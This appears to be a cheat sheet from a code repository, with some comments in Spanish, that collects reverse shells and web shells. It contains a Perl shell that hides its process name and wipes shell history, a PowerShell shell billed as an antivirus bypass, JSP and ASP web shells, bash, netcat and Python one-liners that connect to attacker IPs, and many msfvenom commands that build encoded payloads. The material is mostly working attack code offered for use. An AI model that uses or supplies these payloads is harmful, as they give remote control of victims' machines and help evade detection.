Skip to content

ReverseShell

Reverse Shells GPLv3 license

Perl Rshell Generic badge

#!/usr/bin/perl 
# rshell.pl 1.0 Reverse Shell     coded by Sha0 (http://BadChecksum.cjb.net)
#
# ideal para saltar protecciones noexec del temp:
# /usr/bin/perl /tmp/bs.pl <remoteip> <remoteport> [<processname>]

use Socket;
use POSIX qw(setsid);

#$SIG{'INT'}='IGNORE';
#$SIG{'TERM'}='IGNORE';
#$SIG{'HUP'}='IGNORE';
#$SIG{'KILL'}='IGNORE';
#$SIG{'CHLD'}='IGNORE'; #if(fork()){exit(0);};

die ("hay que especificar ip y puerto y opcionalmente el processname") if ($#ARGV != 1 && $#ARGV != 2);

my $host = $ARGV[0];
my $port = $ARGV[1];
my $timeout = 20;
my $buffer, $request="", $ex;
my $procname = "/usr/sbin/httpd";


$procname = $ARGV[2] if ($#ARGV == 2);



    delete $ENV{'HISTFILE'};
    delete $ENV{'HISTFILESIZE'};
    delete $ENV{'HISTSIZE'};

    if(fork()>0){
        setsid;
        socket (SOCK,PF_INET,SOCK_STREAM,getprotobyname('tcp')) || die "socket $!";
        ($name,$aliases,$type,$len,$remote_addr) = gethostbyname($host);
        $sockadd=pack('S n a4 x8',2,$port,$remote_addr);
        connect (SOCK, $sockadd) || die "connect: $!";

        open(STDIN,">&SOCK");open(STDOUT,"<&SOCK");open(STDERR,"<&SOCK");
        exec {'/bin/bash'} $procname;
    }
    #kill ($$,9);

# EOF

PowerShell

#Powershell reverse shell
#Rshell windows AV bypass, se : .\rshell.ps1 ip port
#https://github.com/tihanyin
#Twitter: @TihanyiNorbert  (No AV detecetion 2021 october)
#Based on the original nishang Framework written by @nikhil_mitt.
$c = New-Object System.Net.Sockets.TCPClient($args[0],$args[1]);
$I = $c.GetStream();
[byte[]]$U = 0..(2-shl15)|%{0};
$U = ([text.encoding]::ASCII).GetBytes("Copyright (C) 2021 Microsoft Corporation. All rights reserved.`n`n")
$I.Write($U,0,$U.Length)
$U = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$I.Write($U,0,$U.Length)
while(($k = $I.Read($U, 0, $U.Length)) -ne 0){;$D = (New-Object System.Text.UTF8Encoding).GetString($U,0, $k);
$a = (iex $D 2>&1 | Out-String );
$r  = $a + (pwd).Path + '> ';
$m = ([text.encoding]::ASCII).GetBytes($r);
$I.Write($m,0,$m.Length);
$I.Flush()};
$c.Close()

JSP

<%@ page import="java.util.*,java.io.*"%>

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
</BODY></HTML>

ASP

iis 5.1
<%
Dim oS
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Call oS.Run("win.com cmd.exe /c c:\Inetpub\shell443.exe",0,True)
%>

Bash

/bin/bash -i >& /dev/tcp/192.168.119.126/443 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f

Python

/usr/bin/python -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.119.229",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

CMD

nc -nve cmd.exe 192.168.119.139 7788

Msfvenom

Windows 

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.203 LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.126 LPORT=4444 -f hta-psh -o evil.hta
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.203 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.126 LPORT=7788 -f exe -o evil.exe
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.119.205 LPORT=3333 -f exe -o r.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x plink.exe -o shell_reverse_msf_encoded_embedded.exe # inject
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.74.25 LPORT=443 -f exe -o evil.exe
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -o shell.jsp
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.49.164 LPORT=4444 -f war -o shell.war
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.49.164 LPORT=3333 -f dll -o evil.dll
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.13 LPORT=1234 -f aspx -o shell.aspx
Linux 
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.126 LPORT=443 -b "\x00\x0a\x0d\x20\x37\x39\x7a\xc2" –e x86/shikata_ga_nai -f raw -o exploit.txt

Weevely

weevely generate <password> <path>
weevely <URL> <password>

HTTP-Reverse-Shell

RealShell

python -c 'import pty; pty.spawn("/bin/bash")'
Presionamos CTRL+Z para enviar el netcat a segundo plano
stty raw -echo
fg
reset
Terminal type? xterm
stty rows 51 columns 178
export TERM=xterm;export SHELL=bash